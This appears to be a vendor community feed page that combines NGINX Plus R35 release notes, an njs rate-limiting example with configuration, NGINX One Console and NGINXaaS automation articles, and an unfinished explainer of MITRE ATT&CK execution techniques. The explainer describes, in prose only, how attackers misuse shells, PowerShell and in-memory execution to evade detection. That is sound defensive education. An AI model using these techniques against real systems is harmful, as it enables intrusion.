Manage Thousands of F5 NGINX Ingress VirtualServerRoutes with Kustomize
NGINX Ingress VirtualServerRoutes require maintaining route files AND manually updating VirtualServer references, a dual-maintenance problem that doesn't scale. This tutorial automates the integration so you only manage route files, and everything else is generated automatically.

VIPTest: Rapid Application Testing for F5 Environments
VIPTest is a Python-based tool for efficiently testing multiple URLs in F5 environments, allowing quick assessment of application behavior before and after configuration changes. It supports concurrent processing, handles various URL formats, and provides detailed reports on HTTP responses, TLS versions, and connectivity status, making it useful for migrations and routine maintenance.

F5 NGINX Plus R35 Release Now Available
We're excited to announce the availability of F5 NGINX Plus Release 35 (R35). Based on NGINX Open Source, NGINX Plus is the only all-in-one software web server, load balancer, reverse proxy, content cache, and API gateway.

New and enhanced features in NGINX Plus R35 include:

- ACME protocol support: This release introduces native support for the Automated Certificate Management Environment (ACME) protocol in NGINX Plus. The ACME protocol automates SSL/TLS certificate lifecycle management by enabling direct communication between clients and certificate authorities for issuance, installation, revocation, and replacement of SSL certificates.
- Automatic JWT renewal and update: This capability simplifies the NGINX Plus renewal experience by automating the process of updating the license JWT for F5 NGINX instances that communicate directly with the F5 licensing endpoint for license reporting.
- Native OIDC enhancements: This release adds support for Relying Party (RP) initiated logout and the UserInfo endpoint to the native OpenID Connect module, streamlining authentication workflows.
- Support for Early Hints: NGINX Plus R35 introduces support for Early Hints (HTTP 103), which optimizes website performance by allowing browsers to preload resources before the final server response, reducing latency and accelerating content display.
- QUIC CUBIC congestion control: With R35, we have extended the congestion-control algorithms supported by our HTTP/3/QUIC implementation to include CUBIC, which provides better bandwidth utilization, resulting in quicker load times and faster downloads.
- NGINX JavaScript QuickJS, full ES2023 support: With this NGINX Plus release, we now support the full ES2023 JavaScript specification for the QuickJS runtime, for your custom NGINX scripting and extensibility needs using NGINX JavaScript.

Changes to Platform Support

NGINX Plus R35 introduces the following updates to the NGINX Plus technical specification.
Added platforms: support for the following platforms has been added with this release:

- Alpine Linux 3.22
- RHEL 10

Removed platforms: support for the following platforms has been removed starting with this release:

- Alpine Linux 3.18 (reached end of support in May 2025)
- Ubuntu 20.04 LTS (reached end of support in May 2025)

Deprecated platforms:

- Alpine Linux 3.19

Note: For SUSE Linux Enterprise Server (SLES) 15, SP6 is now the required service pack version. Older service packs have reached vendor end of life and are no longer supported.

New Features in Detail

ACME Protocol Support

The ACME protocol (Automated Certificate Management Environment) is a communications protocol primarily designed to automate the process of issuing, validating, renewing, and revoking digital security certificates (e.g., TLS/SSL certificates). It allows clients to interact with a Certificate Authority (CA) without requiring manual intervention, simplifying the deployment of secure websites and other services that rely on HTTPS.

With the NGINX Plus R35 release, we are pleased to announce the preview release of native ACME support in NGINX. ACME support is available as a Rust-based dynamic module for both NGINX Open Source and enterprise F5 NGINX One customers using NGINX Plus.

Native ACME support greatly simplifies and automates the process of obtaining and renewing SSL/TLS certificates. There's no need to track certificate expiration dates or manually update and review configs each time an update is needed. NGINX can now communicate directly with ACME-compatible Certificate Authorities (CAs) such as Let's Encrypt to handle certificate management without external tools like certbot or cert-manager, or ongoing manual intervention. This reduces complexity, minimizes operational overhead, and streamlines the deployment of encrypted HTTPS for websites and applications, while also making the certificate management process more secure and less error-prone.
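As an illustration, a minimal setup might look roughly like the sketch below. The directive names and placement follow our reading of the preview module's documentation; the issuer URI, domain, and paths are placeholders, and the exact syntax may differ, so check the NGINX ACME docs before use.

```nginx
# Hypothetical minimal ACME setup; directive names and placement are
# assumptions based on the preview module and may differ in your release.
resolver 127.0.0.1:53;                     # the CA directory must be resolvable

acme_issuer letsencrypt {
    uri        https://acme-v02.api.letsencrypt.org/directory;
    contact    mailto:admin@example.com;
    state_path /var/cache/nginx/acme-letsencrypt;
    accept_terms_of_service;
}

server {
    listen      443 ssl;
    server_name example.com;

    acme_certificate letsencrypt;          # request and auto-renew a certificate

    ssl_certificate     $acme_certificate;
    ssl_certificate_key $acme_certificate_key;
}
```

The certificate and key are exposed as variables so a renewal can be picked up without editing the configuration.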
The implementation introduces a new module, ngx_http_acme_module, providing built-in directives for requesting, installing, and renewing certificates directly from the NGINX configuration. The current implementation supports the HTTP-01 challenge, with support for the TLS-ALPN and DNS-01 challenges planned for the future. For a detailed overview of the implementation and the value it brings, refer to the ACME blog post. For step-by-step instructions on configuring ACME in your environment, refer to the NGINX docs.

Automatic JWT Renewal and Update

This feature enables automatic updates of the JWT license for customers reporting their usage directly to the F5 licensing endpoint (product.connect.nginx.com) after a successful subscription renewal. It applies to subscriptions nearing expiration (within 30 days) as well as subscriptions that have expired but remain within the 90-day grace period. Here is how the feature works:

1. Starting 30 days before JWT license expiration, NGINX Plus notifies the licensing endpoint of the upcoming expiration as part of the automatic usage reporting process.
2. The licensing endpoint continually checks the F5 CRM system for a renewed NGINX One subscription.
3. Once the subscription is successfully renewed, the F5 licensing endpoint sends the updated JWT to the corresponding NGINX Plus instance.
4. The NGINX Plus instance automatically deploys the renewed JWT license to the location determined by your existing configuration, with no NGINX reload or service restart required.

Note: The renewed JWT file received from F5 is named nginx-mgmt-license and is located at the state_path location on your NGINX instance. For more details, refer to the NGINX docs.

Native OpenID Connect Module Enhancements

The NGINX Plus R34 release introduced native support for OpenID Connect (OIDC) authentication.
Continuing that momentum, this release adds support for OIDC Relying Party (RP) initiated logout, along with support for retrieving claims via the OIDC UserInfo endpoint.

Relying Party (RP) Initiated Logout

RP-initiated logout is a method used in federated authentication systems (for example, systems using OpenID Connect (OIDC) or Security Assertion Markup Language (SAML)) that allows a user to log out of an application (the relying party) and propagate the logout request to other services in the authentication ecosystem, such as the identity provider (IdP) and other sessions tied to the user. This facilitates session synchronization and clean-up across multiple applications and environments.

RP-initiated logout support in the NGINX native OIDC module provides a seamless user experience by making authentication and logout workflows more consistent, particularly in Single Sign-On (SSO) environments. It significantly improves security by ensuring user sessions are terminated securely, reducing the risk of unauthorized access. It also simplifies development by minimizing the need for custom coding and promoting adherence to best practices. Additionally, it strengthens user privacy and supports compliance efforts by enabling users to easily terminate sessions, reducing the exposure from lingering sessions.

The flow works as follows: the client (browser) initiates a logout by sending a request to the relying party's (NGINX's) logout endpoint. NGINX, as the RP, adds additional parameters to the request and redirects it to the IdP, which terminates the associated user session and redirects the client to the specified post_logout_uri. Finally, NGINX presents a post-logout confirmation page, signaling completion of the logout process and ensuring session termination across both the relying party and the identity provider.
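To make the flow concrete, the wiring might look roughly like the sketch below. The provider details are placeholders, and the directive names and their placement are assumptions based on the release notes; consult the NGINX deployment guide for the exact syntax.

```nginx
# Hypothetical RP-initiated logout wiring; directive placement is an assumption.
http {
    oidc_provider my_idp {
        issuer        https://idp.example.com/realms/demo;   # illustrative IdP
        client_id     my_client;
        client_secret my_client_secret;
    }

    server {
        listen 443 ssl;

        # Assumed new directives: the RP endpoint that starts the logout,
        # and where the IdP should send the browser once the session is gone.
        logout_uri      /logout;
        post_logout_uri https://www.example.com/logged-out;

        location / {
            auth_oidc  my_idp;        # protect the application with OIDC
            proxy_pass http://backend;
        }
    }
}
```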
UserInfo Retrieval Support

The OIDC UserInfo endpoint is used by applications to retrieve profile information about the authenticated identity. Applications can use this endpoint to retrieve profile details, preferences, and other user-specific information to ensure a consistent user-management process.

Support for the UserInfo endpoint in the native OIDC module provides a standardized mechanism for fetching user claims from identity providers (IdPs), simplifying authentication workflows and reducing overall system complexity. A standard mechanism also helps define and adopt development best practices for retrieving user claims across client applications, offering value to developers, administrators, and end users.

The implementation enables the RP (NGINX) to call an identity provider's OIDC UserInfo endpoint with the access token (Authorization: Bearer) and obtain scope-dependent end-user claims (for example, profile, email, scope, address). This provides a standard, configuration-driven mechanism for claim retrieval across client applications and reduces integration complexity.

Several new directives (logout_uri, post_logout_uri, logout_token_hint, and userinfo) have been added to the ngx_http_oidc_module to support both features. Refer to our technical blog on how NGINX Plus R35 offers frictionless logout and UserInfo retrieval support in the native OIDC implementation for a comprehensive overview of both features and how they work under the hood. For instructions on configuring the native OIDC module for various identity providers, refer to the NGINX deployment guide.

Early Hints Support

Early Hints (RFC 8297) is an HTTP status code that improves website performance by allowing the server to send preliminary hints to the client before the final response is ready.
Specifically, the server sends a 103 status code with headers indicating which resources (such as CSS, JavaScript, and images) the client can pre-fetch while the server is still generating the full response. Most major web browsers, including Chrome, Safari, and Edge, support it today.

A new NGINX directive, early_hints, has been added to specify the conditions under which backends can send Early Hints to the client. NGINX parses the Early Hints from the backend and forwards them to the client. The following example proxies Early Hints for HTTP/2 and HTTP/3 clients and disables them for HTTP/1.1:

    early_hints $http2$http3;
    proxy_pass http://bar.example.com;

For more details, refer to the NGINX docs and a detailed blog on Early Hints support in NGINX.

QUIC: Support for the CUBIC Congestion Control Algorithm

CUBIC is a congestion control algorithm designed to optimize internet performance. It is widely used and well tested in TCP implementations, and excels in high-bandwidth, high-delay networks by efficiently managing data transmission, ensuring faster speeds, rapid recovery from congestion, and reduced latency. Its adaptability to varied network conditions and fair resource allocation make it a reliable choice for delivering a smooth, responsive online experience and enhancing overall user satisfaction.

We announced support for the CUBIC congestion algorithm in NGINX Open Source mainline version 1.27.4. All bug fixes and enhancements since then have been merged into NGINX Plus R35. For a detailed overview of the implementation, refer to our blog on the topic.

NGINX JavaScript QuickJS: Full ES2023 Support

We introduced preview support for the QuickJS runtime in NGINX JavaScript (njs) version 0.8.6 with the NGINX Plus R33 release. We have been steadily focused on this initiative since, and are pleased to announce full ES2023 JavaScript specification support in njs version 0.9.1 with the NGINX Plus R35 release.
With full ES2023 specification support, you can now use the latest JavaScript features that modern developers expect as standard when extending NGINX capabilities with njs. Refer to this detailed blog for a comprehensive overview of our QuickJS implementation, the motivation behind QuickJS runtime support, and where we are headed with NGINX JavaScript. For specific details on how to leverage QuickJS in your njs scripts, please refer to our documentation.

Other Enhancements and Bug Fixes

Variable-Based Access Control Support

To enable robust access control using identity claims, R34 and earlier versions required a workaround involving the auth_jwt_require directive: reprocessing the ID token with the auth_jwt module to manage access based on claims. This approach introduced configuration complexity and performance overhead.

With R35, NGINX simplifies this through the auth_require directive, which allows direct use of claims for resource-based access control without relying on auth_jwt. The directive is part of a new module, ngx_http_auth_require_module, added in this release.

For example, the following NGINX OIDC configuration maps the role claim from the ID token to the $admin_role variable and sets it to 1 if the user's role is "admin". The /admin location then uses auth_require $admin_role to restrict access, allowing only users with the admin role to proceed:

    http {
        oidc_provider my_idp {
            ...
        }

        map $oidc_claim_role $admin_role {
            "admin" 1;
        }

        server {
            auth_oidc my_idp;

            location /admin {
                auth_require $admin_role;
            }
        }
    }

Though the directive is not exclusive to OIDC, when paired with auth_oidc it provides a clean, declarative Role-Based Access Control (RBAC) mechanism within the server configuration. For example, you can easily configure access so only admins reach the /admin location, while either admins or users with specific permissions access other locations. The result is streamlined, efficient, and practical access management directly in NGINX.
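The "admins or users with specific permissions" case could be sketched along these lines. The claim names and values here are hypothetical; adjust them to the claims your IdP actually issues.

```nginx
# Hypothetical: allow /editor for admins OR for users whose "permissions"
# claim contains "edit". Claim names and values depend on your IdP.
map "$oidc_claim_role:$oidc_claim_permissions" $can_edit {
    "~^admin:"   1;   # any admin
    "~:.*edit"   1;   # anyone with an "edit" permission
    default      0;
}

server {
    auth_oidc my_idp;

    location /editor {
        auth_require $can_edit;   # admins or editors may proceed
    }
}
```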
Note that the new auth_require directive does not replace auth_jwt_require; the two serve distinct purposes. While auth_jwt_require is an integral part of JWT validation in the JWT module, focusing on header and claim checks, auth_require operates in a separate ACCESS phase for access control. Deprecating auth_jwt_require would reduce flexibility, particularly in "satisfy" modes of operation, and complicate configurations. Additionally, auth_jwt_require plays a critical role in initializing JWT-related variables, enabling their use in subrequests. This initialization, crucial for JWE claims, cannot be done via REWRITE-module directives because JWE claims are not available before JWT decryption.

Support for JWS RSASSA-PSS Algorithms

RSASSA-PSS algorithms are used to verify the signatures of JSON Web Tokens (JWTs), ensuring their authenticity and integrity. In NGINX, these algorithms are typically employed via the auth_jwt module when validating JWTs signed with RSASSA-PSS. We are adding support for the following algorithms, as specified in RFC 7518 (Section 3.5):

- PS256
- PS384
- PS512

Improved Node Outage Detection and Logging

This release also improves timeout handling for zone_sync connections, enabling faster detection of offline nodes and reducing the risk of counter accumulation. The improvement is aimed at better synchronization of nodes in a cluster and earlier detection of failures, improving the system's overall performance and reliability. Additional heuristics have been added to detect blocked workers and proactively address prolonged event-loop times.

License API Updates

The NGINX license API endpoint now provides additional information: the "uuid" parameter in the license information is now available via the API endpoint.
Changes Inherited from NGINX Open Source

NGINX Plus R35 is based on the NGINX 1.29.0 mainline release and inherits all functional changes, features, and bug fixes made since NGINX Plus R34 was released (which was based on the 1.27.4 mainline release).

Features:

- Early Hints support: support for response code 103 from proxy and gRPC backends.
- CUBIC congestion control algorithm support in QUIC connections.
- Loading of secret keys from hardware tokens with an OpenSSL provider.
- Support for the "so_keepalive" parameter of the "listen" directive on macOS.

Changes:

- The logging level of SSL errors in a QUIC handshake has been changed from "error" to "crit" for critical errors and to "info" for the rest; the logging level of unsupported QUIC transport parameters has been lowered from "info" to "debug".

Bug fixes:

- nginx could not be built by gcc 15 if the ngx_http_v2_module or ngx_http_v3_module modules were used.
- nginx might not be built by gcc 14 or newer with -O3 -flto optimization if ngx_http_v3_module was used.
- Fixed a bug in the "grpc_ssl_password_file", "proxy_ssl_password_file", and "uwsgi_ssl_password_file" directives when loading SSL certificates and encrypted keys from variables; the bug had appeared in 1.23.1.
- Fixed the $ssl_curve and $ssl_curves variables when using pluggable curves in OpenSSL.
- nginx could not be built with musl libc.
- Bug fixes and performance improvements in HTTP/3.

Security:

- (CVE-2025-53859) SMTP authentication process memory over-read: this vulnerability in the NGINX ngx_mail_smtp_module may allow an unauthenticated attacker to trigger a buffer over-read, resulting in worker-process memory disclosure to the authentication server.

For the full list of new changes, features, bug fixes, and workarounds inherited from recent releases, see the NGINX changes.

Changes to the NGINX JavaScript Module

NGINX Plus R35 incorporates changes from the NGINX JavaScript (njs) module version 0.9.1.
The following is a list of notable changes in njs since 0.8.9 (the version shipped with NGINX Plus R34).

Features:

- Added support for the QuickJS-NG library.
- Added support for the WebCrypto API, Fetch API, TextEncoder and TextDecoder, and the querystring, crypto, and xml modules for the QuickJS engine.
- Added a state file for shared dictionaries.
- Added ECDH support for WebCrypto.
- Added support for reading r.requestText or r.requestBuffer from a temporary file.

Improvements:

- Performance improvements from refactored handling of built-in strings, symbols, and small integers.
- Multiple memory-usage improvements.
- Improved reporting of unhandled promise rejections.

Bug fixes:

- Fixed a segfault in njs_property_query(); the issue was introduced in b28e50b1 (0.9.0).
- Fixed a Function constructor template injection.
- Fixed GCC compilation with the -O3 optimization level.
- Fixed a "constant is too large for 'long'" warning on MIPS -mabi=n32.
- Fixed compilation with GCC 4.1.
- Fixed %TypedArray%.from() when the buffer is detached by the mapper.
- Fixed %TypedArray%.prototype.slice() with overlapping buffers.
- Fixed handling of detached buffers for typed arrays.
- Fixed frame saving for async functions with closures.
- Fixed RegExp compilation of patterns with escaped '[' characters.
- Fixed handling of undefined values of a captured group in RegExp.prototype[Symbol.split]().
- Fixed a GCC 15 build error with -Wunterminated-string-initialization.
- Fixed name corruption in variables and headers processing.
- Fixed the incr() method of a shared dictionary with an empty init argument for the QuickJS engine.
- Fixed accepting response headers with underscore characters in the Fetch API.
- Fixed Buffer.concat() with a single argument in QuickJS.
- Added a missed syntax error for await in template literals.
- Fixed formatting of non-NULL-terminated strings in exceptions for the QuickJS engine.
- Fixed compatibility with recent changes in QuickJS and QuickJS-NG.
- Fixed serializeToString().
Previously, serializeToString() behaved as exclusiveC14n(), returning a string instead of a Buffer; according to the published documentation, it should behave as c14n().

For a comprehensive list of all the features, changes, and bug fixes, see the njs changelog.

F5 NGINX in F5's Application Delivery & Security Platform

NGINX One is part of F5's Application Delivery & Security Platform. It helps organizations deliver, improve, and secure new applications and APIs. This platform is a unified solution designed to ensure reliable performance, robust security, and seamless scalability for applications deployed across cloud, hybrid, and edge architectures.

NGINX One is the all-in-one, subscription-based package that unifies all of NGINX's capabilities, bringing together the features of NGINX Plus, F5 NGINX App Protect, and NGINX Kubernetes and management solutions into a single, easy-to-consume package. NGINX Plus, a key component of NGINX One, adds features to open-source NGINX that are designed for enterprise-grade performance, scalability, and security.

Ready to try the new release? Follow this guide for more information on installing and deploying NGINX Plus.

NGINX Plus Request body Rate Limit with the NJS module and javascript
The NGINX njs module lets you process requests with JavaScript, the language otherwise known on the backend as Node.js. The module is dynamic for NGINX Plus (https://docs.nginx.com/nginx/admin-guide/dynamic-modules/dynamic-modules/), while for community NGINX it needs to be compiled in.

The code and NGINX configuration are also available at https://github.com/Nikoolayy1/nginx_njs_request_body_limit/tree/main. I used the example rate limiter from https://github.com/nginx/njs-examples and https://clouddocs.f5.com/training/community/nginx/html/class3/class3.html and modified it to rate-limit based on the request body. It works as expected.

The internal redirect r.internalRedirect('@app-backend') is needed because NGINX by default does not populate or save the request body, so the request has to pass through NGINX twice for the body variable to be properly populated.

The NGINX Plus rootless container is a great option for F5 XC RE, where root containers are not accepted; for NGINX on XC RE I have written another article: F5 XC vk8s open source nginx deployment on RE | DevCentral.

NJS "main" file code:

    const defaultResponse = "0";
    const user = 'username';
    const pass = 'username';

    function ratelimit(r) {
        switch (r.method) {
        case 'POST':
            var body = r.requestText;
            r.log(`body: ${body}`);
            if (r.headersIn['Content-Type'] != 'application/x-www-form-urlencoded' || !body.length) {
                r.internalRedirect('@app-backend');
                return;
            }
            var result_user = body.includes(user);
            var result_pass = body.includes(pass);
            if (!result_user) {
                r.internalRedirect('@app-backend');
                return;
            }
            const zone = r.variables['rl_zone_name'];
            const kv = zone && ngx.shared && ngx.shared[zone];
            if (!kv) {
                r.log(`ratelimit: ${zone} js_shared_dict_zone not found`);
                r.internalRedirect('@app-backend');
                return;
            }
            const key = r.variables['rl_key'] || r.variables['remote_addr'];
            const window = Number(r.variables['rl_windows_ms']) || 60000;
            const limit = Number(r.variables['rl_limit']) || 10;
            const now = Date.now();

            let requestData = kv.get(key);
            if (requestData === undefined || requestData.length === 0) {
                requestData = { timestamp: now, count: 1 };
                kv.set(key, JSON.stringify(requestData));
                r.internalRedirect('@app-backend');
                return;
            }
            try {
                requestData = JSON.parse(requestData);
            } catch (e) {
                requestData = { timestamp: now, count: 1 };
                kv.set(key, JSON.stringify(requestData));
                r.internalRedirect('@app-backend');
                return;
            }
            if (!requestData) {
                requestData = { timestamp: now, count: 1 };
                kv.set(key, JSON.stringify(requestData));
                r.internalRedirect('@app-backend');
                return;
            }
            if (now - requestData.timestamp >= window) {
                // window has elapsed: start a new counting window
                requestData.timestamp = now;
                requestData.count = 1;
            } else {
                requestData.count++;
            }
            const elapsed = now - requestData.timestamp;
            r.log(`limit: ${limit} window: ${window} elapsed: ${elapsed} count: ${requestData.count} timestamp: ${requestData.timestamp}`);
            let retryAfter = 0;
            if (requestData.count > limit) {
                retryAfter = 1;
            }
            kv.set(key, JSON.stringify(requestData));
            if (retryAfter) {
                r.return(401, "Unauthorized\n");
                return;
            }
            // fall through: under the limit, forward to the backend
        default:
            r.internalRedirect('@app-backend');
            return;
        }
    }

    export default { ratelimit };  // only ratelimit is defined in this file

NGINX nginx.conf file:

    server {
        listen 80 default_server;
        server_name localhost;

        access_log /var/log/nginx/host.access.log main;

        js_var $rl_zone_name kv;          # shared dict zone name; required variable
        js_var $rl_windows_ms 30000;      # optional window in milliseconds; default 1-minute window if not set
        js_var $rl_limit 3;               # optional limit for the window; default 10 requests if not set
        js_var $rl_key $remote_addr;      # rate limit key; default $remote_addr if not set
        js_set $rl_result main.ratelimit; # call the ratelimit function that returns the retry-after value if the limit is exceeded

        root /var/www/html;
        index index.html;
        include /etc/nginx/mime.types;
        error_log /var/log/nginx/host.error_log debug;

        if ($target) {                    # $target is expected to be defined elsewhere (e.g., via map)
            return 401;
        }

        location / {
            js_content main.ratelimit;
        }

        location @app-backend {
            internal;
            proxy_pass http://backend;
        }

        location /backend {
            internal;
            proxy_set_header Host httpforever.com;
            proxy_pass http://backend/;
        }
    }

(The js_import, js_shared_dict_zone, and upstream "backend" definitions live in the http context; see the linked repository for the full configuration.)

Summary:

There is another example of how to populate the internal request body variable needed by the njs module using the "mirror" option, shown at https://www.f5.com/company/blog/nginx/deploying-nginx-plus-as-an-api-gateway-part-2-protecting-backend-services, but it did not work for me, so I used the "internal" option with r.internalRedirect(uri) (https://nginx.org/en/docs/njs/reference.html).

The njs feature r.subrequest can also be used to populate response headers and body, but it is mainly intended for logging, not rate limiting. Making a real HTTP subrequest from JavaScript is not optimal and will not scale well, so I do not recommend that option; rate limiters are best kept request-based. I also saw a strange bug where the subrequest changed the Content-Type header of the response, and I had to use js_header_filter to change the response header back. NGINX App Protect includes the BD process from F5 BIG-IP AWAF/ASM, which has DoS protections that can monitor the server's response latency dynamically and set automatic thresholds.

Kickstart your journey into becoming an F5 Certified Administrator, NGINX (F5-CA, NGINX)!
The F5 Certified! NGINX Administrator Accelerator is designed and aligned with the applicable NGINX Administrator Certification exams to help candidates prepare for their certification journey.

F5 NGINX One Console July features
Introduction

We are very excited to announce the new set of F5 NGINX One Console features released in July:

- F5 NGINX App Protect WAF policy orchestration
- F5 NGINX Ingress Controller fleet visibility

The NGINX One Console is a central management service in the F5 Distributed Cloud that makes it easier to deploy, manage, monitor, and operate NGINX. It is available to all NGINX and F5 Distributed Cloud subscribers and is included as part of their subscription. If you have any questions about getting access, please reach out to me.

Workshops

Additionally, we are offering complimentary workshops on how to use the NGINX One Console in August and September (North American time zones). These include a presentation, hands-on labs, and demos with live support and guidance.

- July 30 - F5 Test Drive Labs - F5 NGINX One - https://www.f5.com/company/events/test-drive-labs#agenda
- Aug 19 - NGINXperts Workshop - NGINX One Console - https://www.eventbrite.com/e/nginxpert-workshops-nginx-one-console-tickets-1511189742199
- Sept 9 - F5 Test Drive Labs - NGINX One - https://www.f5.com/company/events/test-drive-labs#agenda
- Sept 10 - NGINXperts Workshop - NGINX One Console - https://www.eventbrite.com/e/nginxpert-workshops-nginx-one-console-tickets-1393597239859?aff=oddtdtcreator

NGINX App Protect WAF Policy Orchestration

You can now centrally manage NGINX App Protect WAF in the NGINX One Console: easily create and edit WAF policies, compare changes, and publish to instances and configuration sync groups. Both App Protect v4 and v5 are supported!

Find the guides on how to secure F5 NGINX with NGINX App Protect and the NGINX One Console here: https://docs.nginx.com/nginx-one/nap-integration/

NGINX Ingress Controller Fleet Visibility

NGINX Ingress Controller deployments can now be monitored in the NGINX One Console.
See all versions of your NGINX Ingress Controller deployments, which underlying instances make up the control pods, and the underlying NGINX configuration. Coming later this quarter: CVE monitoring for NGINX Ingress Controller and F5 NGINX Gateway Fabric inclusion.

For details, see how you can connect Ingress Controller to NGINX One Console: https://docs.nginx.com/nginx-one/k8s/add-nic/

Find all the latest additions to the NGINX One Console in our changelog: https://docs.nginx.com/nginx-one/changelog/

The NGINX Impact in F5's Application Delivery & Security Platform

NGINX One Console is part of F5's Application Delivery & Security Platform. It helps organizations deliver, improve, and secure new applications and APIs. This platform is a unified solution designed to ensure reliable performance, robust security, and seamless scalability for applications deployed across cloud, hybrid, and edge architectures.

The NGINX One Console is also a key component of NGINX One, the all-in-one, subscription-based package that unifies all of NGINX's capabilities. NGINX One brings together the features of NGINX Plus, NGINX App Protect, and NGINX Kubernetes and management solutions into a single, easy-to-consume package. As a cornerstone of the NGINX One package, NGINX One Console extends the capabilities of open-source NGINX, adding features designed specifically for enterprise-grade performance, scalability, and security.

F5 NGINX Automation Examples [Part 2: Deploying NGINXaaS with App Protect and Grafana Integration]
Introduction

Welcome back to the F5 NGINX Automation Examples series, where we explore ways to leverage the power of NGINX and F5 technologies for modern application deployment. If you're new to this series, be sure to start with our first article.

This series utilizes the F5 NGINX Automation GitHub repository along with a robust CI/CD platform to facilitate the deployment of F5 NGINX as a Service for Azure (F5 NGINXaaS for Azure), including integrations with F5 NGINX App Protect for enhanced security and Azure Grafana for comprehensive monitoring and visualization of system metrics. The approach is deeply rooted in DevSecOps principles, ensuring that security, automation, and collaboration are woven into every stage of your development and deployment processes.

F5 NGINXaaS for Azure is a versatile and powerful Application Delivery Controller as a Service (ADCaaS) platform that integrates seamlessly with the Microsoft Azure cloud environment. The service harnesses the scalability, flexibility, and reliability of cloud-native infrastructure; combined with the adaptability of NGINX technology, it empowers organizations to deploy, secure, and scale their modern applications and microservices efficiently. Whether you're managing small projects or large-scale enterprise applications, NGINXaaS provides the tools and infrastructure you need to meet your evolving IT and business needs.

In this example, we present a comprehensive, step-by-step guide for setting up a Terraform deployment of NGINXaaS on Azure with NGINX App Protect. The deployment enables advanced load balancing for demonstration applications (tea and coffee) running across two virtual machines, while the NGINX App Protect policy secures the upstream applications, ensuring robust security and traffic management. Furthermore, this guide will walk you through deploying Azure Grafana.
This powerful visualization tool lets you effectively monitor and analyze system metrics, including those from F5 NGINX Plus and the virtual machines. With these insights into how your system behaves, you can spot problems early and tune the deployment for your users and customers.

Architecture Diagram

NGINXaaS + App Protect with Azure Grafana

Workflow guide

Deploying F5 NGINXaaS on Azure with App Protect and Azure Grafana Integration

The workflow guide provides step-by-step instructions on how to deploy using Terraform, along with other relevant instructions.

Note: This workflow guide covers the deployment of precompiled App Protect policies in NGINXaaS using Terraform. Custom security policies for NGINXaaS for Azure can be created and managed via API or the Azure Portal, but not currently through Terraform.

Prerequisites:

Azure Account - Due to the assets being created, the free tier will no longer be applicable.
GitHub Account

Tools:

Cloud Provider: Azure
IaC: Terraform
CI/CD: GitHub Actions

Conclusion

This article outlines how to automate the deployment of F5 NGINXaaS on Azure, including NGINX App Protect and Azure Grafana integration, using Terraform. By following the step-by-step process, you can efficiently create a robust and scalable environment to manage your applications. The integration of NGINX App Protect enhances the security of your deployments, while Azure Grafana provides essential insights through visualization, helping you monitor performance and make informed decisions.

Resources

Elevate Your Cloud Journey with F5 NGINXaaS for Azure
How to Elevate Application Performance and Availability in Azure with F5 NGINXaaS
Enhancing Application Delivery with F5 NGINXaaS for Azure: ADC-as-a-Service Redefined
Introduction to Execution Tactic (TA0002):

Execution refers to the methods adversaries use to run malicious code on a target system. This tactic includes a range of techniques designed to execute payloads after gaining access to the network. It is a key stage in the attack lifecycle, as it allows attackers to activate their malicious actions, such as deploying malware, running scripts, or exploiting system vulnerabilities. Successful execution can lead to deeper system control, enabling attackers to perform actions like data theft, system manipulation, or establishing persistence for future exploitation.

Now, let’s dive into the various techniques under the Execution tactic and explore how attackers use them.

1. T1651: Cloud Administration Command

Cloud management services can be exploited to execute commands within virtual machines. If an attacker gains administrative access to a cloud environment, they may misuse these services to run commands on the virtual machines. Furthermore, if an adversary compromises a service provider or a delegated administrator account, they could also exploit trusted relationships to execute commands on connected virtual machines.

2. T1059: Command and Scripting Interpreter

The misuse of command and script interpreters allows adversaries to execute commands, scripts, or binaries. These interfaces, such as Unix shells on macOS and Linux, the Windows Command Shell, and PowerShell, are common across platforms and provide direct interaction with systems. Cross-platform interpreters like Python, as well as those tied to client applications (e.g., JavaScript, Visual Basic), can also be misused. Attackers may embed commands and scripts in initial access payloads or download them later via an established C2 (Command and Control) channel. Commands may also be executed via interactive shells or through remote services to enable remote execution.
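As a benign illustration of why scripting interpreters are such a powerful execution primitive, the short Python sketch below shows that a single call from an interpreter is enough to spawn a native OS process and capture its output. The "payload" here is a harmless one-liner run through the same Python interpreter, so the example is portable and safe; it stands in for the arbitrary commands an adversary would run once they reach an interpreter on a host.

```python
import subprocess
import sys

# A scripting interpreter needs only one call to spawn a native process and
# capture its output -- the capability adversaries abuse once they can reach
# an interpreter. The "payload" below is a harmless stand-in, executed via
# the same Python binary that runs this script (equivalent to: python -c ...).
payload = "print('executed by the interpreter')"
result = subprocess.run(
    [sys.executable, "-c", payload],
    capture_output=True, text=True, check=True,
)
print(result.stdout.strip())  # -> executed by the interpreter
```

Because blocking interpreters outright is rarely practical, defenders instead monitor interpreter launches (python, pwsh, sh) and unusual parent-child process chains.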
(.001) PowerShell:
As PowerShell is already part of Windows, attackers often exploit it to execute commands discreetly without triggering alarms. It is commonly used for information discovery, lateral movement across networks, and running malware directly in memory, which helps avoid detection because nothing is written to disk. Attackers can also execute PowerShell scripts without launching the powershell.exe program by leveraging .NET interfaces. Tools like Empire, PowerSploit, and PoshC2 make it even easier for attackers to use PowerShell for malicious purposes.
Example - Remote Command Execution

(.002) AppleScript:
AppleScript is a macOS scripting language designed to control applications and system components through inter-application messages called AppleEvents. These AppleEvent messages can be sent by themselves or with AppleScript. They can find open windows, send keystrokes, and interact with almost any open application, either locally or remotely. AppleScript can be executed in various ways, including through the command-line interface (CLI) and built-in applications. However, it can also be abused to trigger actions that exploit both the system and the network.

(.003) Windows Command Shell:
The Windows Command Prompt (CMD) is a lightweight, simple shell on Windows systems, allowing control over most system aspects with varying permission levels, though it lacks the advanced capabilities of PowerShell. CMD can be used remotely via Remote Services. Attackers may use it to execute commands or payloads, often sending input and output through a command-and-control channel.
Example - Remote Command Execution

(.004) Unix Shell:
Unix shells serve as the primary command-line interface on Unix-based systems. They provide control over nearly all system functions, with certain commands requiring elevated privileges. Unix shells can be used to run different commands or payloads. They can also run shell scripts to combine multiple commands as part of an attack.
Example - Remote Command Execution

(.005) Visual Basic:
Visual Basic (VB) is a programming language developed by Microsoft, now considered a legacy technology. Visual Basic for Applications (VBA) and VBScript are derivatives of VB. Malicious actors may exploit VB payloads to execute harmful commands, with common attacks including automating actions via VBScript or embedding VBA content (like macros) in spear-phishing attachments.

(.006) Python:
Attackers often use popular scripting languages, like Python, due to their interoperability, cross-platform support, and ease of use. Python can be run interactively from the command line or through scripts that can be distributed across systems. It can also be compiled into binary executables. With many built-in libraries for system interaction, such as file operations and device I/O, attackers can leverage Python to download payloads, execute commands and scripts, and perform various malicious actions.
Example - Code Injection

(.007) JavaScript:
